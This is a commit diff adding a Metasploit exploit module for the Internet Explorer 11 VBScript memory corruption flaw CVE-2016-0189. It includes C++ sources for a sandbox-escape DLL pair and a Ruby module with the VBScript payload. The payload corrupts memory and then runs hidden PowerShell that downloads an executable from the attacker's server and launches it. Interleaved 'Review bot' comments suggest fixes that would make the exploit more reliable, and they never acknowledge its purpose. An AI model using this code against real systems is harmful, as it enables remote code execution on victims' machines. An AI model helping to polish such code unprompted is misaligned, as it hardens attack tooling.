
Land #7172, Add exploit for CVE-2016-0189 (MSIE)

wchen-r7 3 years ago
parent
commit
2f6e0fb58c

BIN
data/exploits/cve-2016-0189/ielocalserver.dll View File


BIN
data/exploits/cve-2016-0189/ieshell32.dll View File


+ 183
- 0
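--- a/external/source/exploits/cve-2016-0189/ielocalserver.cpp
+++ b/external/source/exploits/cve-2016-0189/ielocalserver.cpp
@@ -0,0 +1,183 @@
+/*
+From: https://gist.github.com/worawit/1213febe36aa8331e092
+
+Simple local HTTP server for IE (with no AppContainer) privilege escalation.
+
+I implemented local server instead of proxy in Ref because 
+local server is easier to code. But local server is less useful then proxy.
+
+Ref:
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
+
+Note:
+From my test, by default IE does not configure intranet site.
+With this default, localhost is treated as internet site (run as low integrity).
+*/
+#define _CRT_SECURE_NO_WARNINGS
+#define WIN32_LEAN_AND_MEAN
+#include <winsock2.h>
+#include <stdio.h>
+#include <string.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define SERVER_PORT 5555
+
+static HANDLE hThread = NULL;
+
+static WCHAR stage2file[256];
+
+static SOCKET serverSk = INVALID_SOCKET;
+static SOCKET peerSk = INVALID_SOCKET;
+
+static SOCKET create_server()
+{
+	struct sockaddr_in skAddr;
+	SOCKET sk;
+	int optval;
+
+	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+	if (sk == INVALID_SOCKET)
+		return INVALID_SOCKET;
+
+	optval = 1;
+	setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, (char*) &optval, sizeof(optval));
+
+	memset(&skAddr, 0, sizeof(skAddr));
+	skAddr.sin_family = AF_INET;
+	skAddr.sin_port = htons(SERVER_PORT);
+	skAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+	if (bind(sk, (struct sockaddr *) &skAddr, sizeof(skAddr)) != 0)
+		goto on_error;
+
+	if (listen(sk, 5) != 0)
+		goto on_error;
+
+	return sk;
+
+on_error:
+	closesocket(sk);
+	return SOCKET_ERROR;
+}
+
+static int send_all(SOCKET sk, char *buffer, int size)
+{
+	int len;
+	while (size > 0) {
+		len = send(sk, buffer, size, 0);
+		if (len <= 0)
+			return 0;
+		buffer += len;
+		size -= len;
+	}
+
+	return 1;
+}
+
+static int local_server()
+{
+	int len;
+	int totalSize;
+	char buffer[4096];
+	HANDLE hFile = INVALID_HANDLE_VALUE;
+
+	serverSk = create_server();
+	if (serverSk == INVALID_SOCKET)
+		return SOCKET_ERROR;
+
+	while (1) {
+		peerSk = accept(serverSk, NULL, NULL);
+		if (peerSk == INVALID_SOCKET) {
+			continue;
+		}
+
+		len = recv(peerSk, buffer, sizeof(buffer), 0);
+		if (len <= 0)
+			goto closepeer;
+
+		hFile = CreateFile(stage2file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+		if (hFile == INVALID_HANDLE_VALUE)
+			break;
+
+		totalSize = GetFileSize(hFile, NULL);
+		if (totalSize == INVALID_FILE_SIZE)
+			break;
+
+		len = _snprintf(buffer, sizeof(buffer), 
+			"HTTP/1.1 200 OK\r\n"
+			"Content-Type: text/html\r\n"
+			"Connection: Close\r\n"
+			"Content-Length: %d\r\n"
+			"\r\n",
+			totalSize
+		);
+		send_all(peerSk, buffer, len);
+
+		while (totalSize > 0) {
+			ReadFile(hFile, buffer, sizeof(buffer), (DWORD*) &len, NULL);
+			send_all(peerSk, buffer, len);
+			totalSize -= len;
+		}
+		CloseHandle(hFile);
+		hFile = INVALID_HANDLE_VALUE;
+
+closepeer:
+		closesocket(peerSk);
+		peerSk = INVALID_SOCKET;
+	}
+
+	if (hFile != INVALID_HANDLE_VALUE) {
+		CloseHandle(hFile);
+	}
+	if (peerSk != INVALID_SOCKET) {
+		closesocket(peerSk);
+		peerSk = INVALID_SOCKET;
+	}
+	if (serverSk != INVALID_SOCKET) {
+		closesocket(serverSk);
+		serverSk = INVALID_SOCKET;
+	}
+
+	return 0;
+}
+
+DWORD WINAPI threadProc(void *param)
+{
+	WSADATA wsaData;
+	WSAStartup(MAKEWORD(2 ,2), &wsaData);
+
+	local_server();
+
+	WSACleanup();
+
+	DeleteFile(stage2file);
+	return 0;
+}
+
+void do_work()
+{
+	GetEnvironmentVariableW(L"stage2file", stage2file, sizeof(stage2file));
+
+	hThread = CreateThread(NULL, 0, threadProc, NULL, 0, NULL);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		do_work();
+		break;
+	case DLL_PROCESS_DETACH:
+		if (hThread) {
+			WaitForSingleObject(hThread, INFINITE);
+			CloseHandle(hThread);
+		}
+		break;
+	}
+	return TRUE;
+}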
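Review bot: `do_work` passes `sizeof(stage2file)` as the `nSize` argument of `GetEnvironmentVariableW` (file line 160), but that parameter is a count of WCHARs, not bytes, so the call is told the 256-element buffer holds 512 characters and the return value is never checked; write it as `if (GetEnvironmentVariableW(L"stage2file", stage2file, ARRAYSIZE(stage2file)) == 0) return;`. The same byte/character mix-up is in both `GetEnvironmentVariableW` calls of ieshell32.cpp in this commit. In `local_server`, the `while (totalSize > 0)` loop ignores the results of `ReadFile` and `send_all`, so a failed read leaves `len` stale and the loop keeps subtracting the previous count; the `_snprintf` result is likewise handed to `send_all` without checking for a negative return. On its `on_error` path `create_server` returns `SOCKET_ERROR` (an `int`) from a function whose callers compare against `INVALID_SOCKET`; the values happen to compare equal after conversion, but returning `INVALID_SOCKET` as the earlier branch does states the intent.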

+ 39
- 0
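--- a/external/source/exploits/cve-2016-0189/ieshell32.cpp
+++ b/external/source/exploits/cve-2016-0189/ieshell32.cpp
@@ -0,0 +1,39 @@
+/*
+From: https://gist.github.com/worawit/1213febe36aa8331e092
+
+Fake shell32.dll to be loaded after modified %SystemRoot%
+*/
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+static void do_work()
+{
+	WCHAR envBuffer[256];
+
+	GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
+	// restore system root
+	SetEnvironmentVariableW(L"SystemRoot", envBuffer);
+	//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
+
+	GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
+	SetEnvironmentVariableW(L"MyDllPath", NULL);
+
+	// shell32.dll will be unloaded, use another dll
+	LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		do_work();
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}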
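Review bot: `do_work` discards the return value of both `GetEnvironmentVariableW` calls (file lines 13 and 18), so if `MyDllPath` is absent `envBuffer` still holds whatever was copied for `SaveSystemRoot` and that stale string is passed to `LoadLibraryExW`; guard the second lookup with `if (GetEnvironmentVariableW(L"MyDllPath", envBuffer, ARRAYSIZE(envBuffer)) == 0) return;` (the size argument is a character count, the same `sizeof` issue as in ielocalserver.cpp). The commented-out `//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);` on line 16 should be deleted, or replaced by a comment stating why the variable is deliberately left in the environment. Nothing in this file documents the `SaveSystemRoot`/`MyDllPath` contract with whoever loads it; a short header comment such as `// Expects SaveSystemRoot (original %SystemRoot%) and MyDllPath (library to load) in the process environment` would tell a maintainer where those values are expected to come from.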

+ 482
- 0
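--- a/modules/exploits/windows/browser/ms16_051_vbscript.rb
+++ b/modules/exploits/windows/browser/ms16_051_vbscript.rb
@@ -0,0 +1,482 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Internet Explorer 11 VBScript Engine Memory Corruption",
+      'Description'    => %q{
+        This module exploits the memory corruption vulnerability (CVE-2016-0189)
+        present in the VBScript engine of Internet Explorer 11.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Theori',                                              # Original RE research and exploitation
+          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'Windows 10 with IE 11', { } ]
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-0189' ],
+          [ 'MSB', 'MS16-051' ]
+        ],
+      'Arch'           => ARCH_X86_64,
+      'DisclosureDate' => "May 10 2016",
+      'DefaultTarget'  => 0))
+  end
+
+  def setup
+    # @stage2html = Rex::Text.rand_text_alphanum(6)
+    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
+    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
+    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
+    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
+    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
+    super
+  end
+
+  def exploit_html(req_uri)
+    srvhost = datastore['SRVHOST']
+    srvport = datastore['SRVPORT']
+
+    template = <<-EOF
+    <html>
+    <head>
+    <meta http-equiv="x-ua-compatible" content="IE=10">
+    </head>
+    <body>
+
+        <script type="text/vbscript">
+            Dim downloadFiles
+            Dim cacheRegex
+            Dim cacheFiles(3)
+
+            Dim downloadState
+            Dim pinTime
+
+            Dim oFSO
+            Dim oWS
+            Dim shell
+
+            function FindFile(path, regexFile)
+                FindFile = ""
+                For Each f in oFSO.GetFolder(path).Files
+                    If regexFile.Test(f.Name) Then
+                        FindFile = f.Name
+                        Exit For
+                    End If
+                Next
+            end function
+
+            function SearchCache(path, regexFile)
+                SearchCache = ""
+                For Each fld in oFSO.GetFolder(path).SubFolders
+                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
+                        filename = FindFile(path & "\\" & fld.Name, regexFile)
+                        If filename <> "" Then
+                            SearchCache = path & "\\" & fld.Name & "\\" & filename
+                            Exit For
+                        End If
+                    'End If
+                Next
+            end function
+
+            function loaddll()
+                On Error Resume Next
+
+                Set wshSystemEnv = oWS.Environment("Process")
+                tmpDir = oFSO.GetSpecialFolder(2)
+
+                tmpSysDir = tmpDir & "\\System32"
+                tmpShellFile = tmpSysDir & "\\shell32.dll"
+                oFSO.CreateFolder(tmpSysDir)
+                oFSO.MoveFile cacheFiles(0), tmpShellFile
+
+                mydllFile = tmpDir & "\\" & downloadFiles(1)
+                oFSO.MoveFile cacheFiles(1), mydllFile
+                wshSystemEnv("MyDllPath") = mydllFile
+
+                If (UBound(downloadFiles) = 2) Then
+                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
+                    oFSO.MoveFile cacheFiles(2), stage2File
+                    wshSystemEnv("stage2file") = stage2File
+                End If
+
+                saveRoot = wshSystemEnv("SystemRoot")
+                wshSystemEnv("SaveSystemRoot") = saveRoot
+                wshSystemEnv("SystemRoot") = tmpDir
+                Set shell = CreateObject("Shell.Application")
+
+                If (UBound(downloadFiles) = 2) Then
+                    call tolocal()
+                End If
+            end function
+
+            Sub OnDownloadDone()
+                If InStr(userAgent, "NT 5.") > 0 Then
+                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
+                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
+                Else
+                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
+                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
+                End If
+
+                Set regexFile = new regexp
+                regexFile.Pattern = cacheRegex(downloadState)
+                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
+                If cacheFiles(downloadState) = "" Then
+                    Exit Sub
+                End If
+
+                If downloadState = UBound(downloadFiles) Then
+                    loaddll()
+                Else
+                    downloadState = downloadState + 1
+                    DoDownload()
+                End If
+            End Sub
+
+            Sub DoDownload()
+                pinTime = Now
+                call getdll(downloadFiles(downloadState))
+            End Sub
+
+        Sub runshell()
+            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
+            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
+            Set oFSO = CreateObject("Scripting.FileSystemObject")
+            Set oWS = CreateObject("WScript.Shell")
+            downloadState = 0
+            DoDownload()
+        End Sub
+
+        </script>
+
+        <script type="text/vbscript">
+            Dim bl
+            Dim plunge(32)
+            Dim y(32)
+            prefix = "%u4141%u4141"
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
+            b = String(64000, "D")
+            c = d & b
+            x = UnEscape(c)
+
+            Class ArrayWrapper
+                Dim A
+
+                Private Sub Class_Initialize
+                    ReDim Preserve AA(1, 2000)
+                    A = AA
+                End Sub
+
+                Public Sub Resize()
+                    ReDim Preserve A(1, 1)
+                End Sub
+            End Class
+
+            Class Spray
+            End Class
+
+
+            Function getAddr (arg1, s)
+          bl = Null
+          Set bl = New ArrayWrapper
+
+          For i = 0 To 32
+            Set plunge(i) = s
+          Next
+
+                Set bl.A(arg1, 2) = s
+
+          Dim addr
+                Dim i
+                For i = 0 To 31
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
+                    End If
+            y(i) = Null
+                Next
+
+          If addr = Null Then
+            document.location.href = document.location.href
+            Return
+          End If
+
+          getAddr = addr
+        End Function
+
+        Function leakMem (arg1, addr)
+          d = prefix & "%u0008%u4141%u4141%u4141"
+                c = d & intToStr(addr) & b
+                x = UnEscape(c)
+
+          bl = Null
+                Set bl = New ArrayWrapper
+
+                Dim o
+                o = bl.A(arg1, 2)
+
+          leakMem = o
+        End Function
+
+        Sub overwrite (arg1, addr)
+          d = prefix & "%u400C%u0000%u0000%u0000"
+                c = d & intToStr(addr) & b
+                x = UnEscape(c)
+
+          bl = Null
+                Set bl = New ArrayWrapper
+                bl.A(arg1, 2) = CSng(0)
+        End Sub
+
+            Function exploit (arg1)
+                Dim addr
+                Dim csession
+                Dim olescript
+                Dim mem
+
+          Set sp = New Spray
+          addr = getAddr(arg1, sp)
+          mem = leakMem(arg1, addr + 8)
+          csession = strToInt(Mid(mem, 3, 2))
+          mem = leakMem(arg1, csession + 4)
+          olescript = strToInt(Mid(mem, 1, 2))
+          overwrite arg1, olescript + &H174
+          runshell()
+
+        End Function
+
+            Function triggerBug
+                bl.Resize()
+
+                Dim i
+                For i = 0 To 32
+                    y(i) = Mid(x, 1, 24000)
+                Next
+            End Function
+        </script>
+
+        <script type="text/javascript">
+            var userAgent = navigator.userAgent;
+            var oReq;
+            function getdll(downloadFile)
+            {
+                oReq = new XMLHttpRequest();
+                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
+                oReq.onreadystatechange = handler;
+                oReq.send();
+            }
+            function handler()
+            {
+                if (oReq.readyState == 4 && oReq.status == 200) {
+                    OnDownloadDone();
+                }
+            }
+            function tolocal()
+            {
+                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
+            }
+            function strToInt(s)
+            {
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
+            }
+            function intToStr(x)
+            {
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
+            }
+            var o;
+            o = {"valueOf": function () {
+                    triggerBug();
+                    return 1;
+                }};
+            setTimeout(function() {exploit(o);}, 50);
+        </script>
+    </body>
+    </html>
+        EOF
+
+    template
+  end
+
+  def stage2_html(req_uri)
+
+    template = <<-EOF
+    <html>
+    <head>
+    <meta http-equiv="x-ua-compatible" content="IE=10">
+    </head>
+    <body>
+        <script type="text/vbscript">
+            Dim aw
+            Dim plunge(32)
+            Dim y(32)
+            prefix = "%u4141%u4141"
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
+            b = String(64000, "D")
+            c = d & b
+            x = UnEscape(c)
+
+            Class ArrayWrapper
+                Dim A()
+                Private Sub Class_Initialize
+                    ReDim Preserve A(1, 2000)
+                End Sub
+
+                Public Sub Resize()
+                    ReDim Preserve A(1, 1)
+                End Sub
+            End Class
+
+            Class Dummy
+            End Class
+
+            Function getAddr (arg1, s)
+                aw = Null
+                Set aw = New ArrayWrapper
+
+                For i = 0 To 32
+                    Set plunge(i) = s
+                Next
+
+                Set aw.A(arg1, 2) = s
+
+                Dim addr
+                Dim i
+                For i = 0 To 31
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
+                    End If
+                    y(i) = Null
+                Next
+
+                If addr = Null Then
+                    document.location.href = document.location.href
+                    Return
+                End If
+
+                getAddr = addr
+            End Function
+
+            Function leakMem (arg1, addr)
+                d = prefix & "%u0008%u4141%u4141%u4141"
+                c = d & intToStr(addr) & b
+                x = UnEscape(c)
+
+                aw = Null
+                Set aw = New ArrayWrapper
+
+                Dim o
+                o = aw.A(arg1, 2)
+
+                leakMem = o
+            End Function
+
+            Sub overwrite (arg1, addr)
+                d = prefix & "%u400C%u0000%u0000%u0000"
+                c = d & intToStr(addr) & b
+                x = UnEscape(c)
+
+                aw = Null
+                Set aw = New ArrayWrapper
+                aw.A(arg1, 2) = CSng(0)
+            End Sub
+
+            Function exploit (arg1)
+                Dim addr
+                Dim csession
+                Dim olescript
+                Dim mem
+
+                Set dm = New Dummy
+                addr = getAddr(arg1, dm)
+                mem = leakMem(arg1, addr + 8)
+                csession = strToInt(Mid(mem, 3, 2))
+                mem = leakMem(arg1, csession + 4)
+                olescript = strToInt(Mid(mem, 1, 2))
+                overwrite arg1, olescript + &H174
+
+                Set shObj = CreateObject("Wscript.shell")
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
+                shObj.Run("%temp%\\#{@payload_exe}")
+
+            End Function
+
+            Function triggerBug
+                aw.Resize()
+
+                Dim i
+                For i = 0 To 32
+                    y(i) = Mid(x, 1, 24000)
+                Next
+            End Function
+        </script>
+
+        <script type="text/javascript">
+            function strToInt(s)
+            {
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
+            }
+            function intToStr(x)
+            {
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
+            }
+            var o;
+            o = {"valueOf": function () {
+                    triggerBug();
+                    return 1;
+                }};
+            setTimeout(function() {exploit(o);}, 50);
+        </script>
+    </body>
+    </html>
+
+      EOF
+      template
+  end
+
+  def on_request_uri(cli, request)
+    # used for some debugging stuff
+    ies = @ieshell
+    ls  = @localsrv
+    pm  = @pm_escape_html
+
+    print_status("Received request: #{request.uri}")
+      if request.uri =~ /.*#{ies}.*$/
+        print_status("Sending stage two DLL ...")
+        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+      elsif request.uri =~ /.*#{ls}.*$/
+        print_status("Sending local server DLL ...")
+        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+      elsif request.uri =~ /.*#{pm}.*$/
+        rq = "#{get_resource.chomp('/')}"
+        gm = stage2_html(rq)
+        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+      elsif request.uri =~ /.*#{@payload_uri}$/
+        return if ((payload = regenerate_payload(cli)) == nil)
+        print_status("Sending payload ...")
+        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
+      else
+        print_status("Sending main page ..")
+        send_response(cli, exploit_html(request.uri))
+      end
+  end
+
+end
+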
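Review bot: `exploit_html` and `stage2_html` splice `datastore['SRVHOST']` and `datastore['SRVPORT']` straight into the URLs the browser fetches (file lines 282 and 416), so if SRVHOST is left at the listen-on-all-interfaces value the HttpServer mixin defaults to (by inference from the mixin, not visible here) the client is pointed at an unroutable address; the mixin's `get_uri` helper is the conventional way to build these URLs, which means threading `cli` from `on_request_uri` into both template methods instead of passing only the raw URI string. The `if` chain in `on_request_uri` (lines 461–478) is indented two levels deeper than the method body and the VBScript heredoc in `exploit_html` mixes 8-, 10- and 16-space indents (lines 198–264), which hides the control flow; reindenting and deleting the commented-out `# @stage2html = Rex::Text.rand_text_alphanum(6)` in `setup` would bring the file in line with the rest of the tree. `setup` also reads both DLL blobs with `File.open` before calling `super` and keeps them in instance variables for the life of the module; a one-line comment saying they are loaded once so every request can be served from memory would explain the placement. The `'Description'` says nothing about the module serving three additional resources or about the second page being loaded from `localhost:5555` by the staged DLL, so a reader of the module alone cannot tell why `on_request_uri` has four URI branches; a sentence describing that flow belongs in the description.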
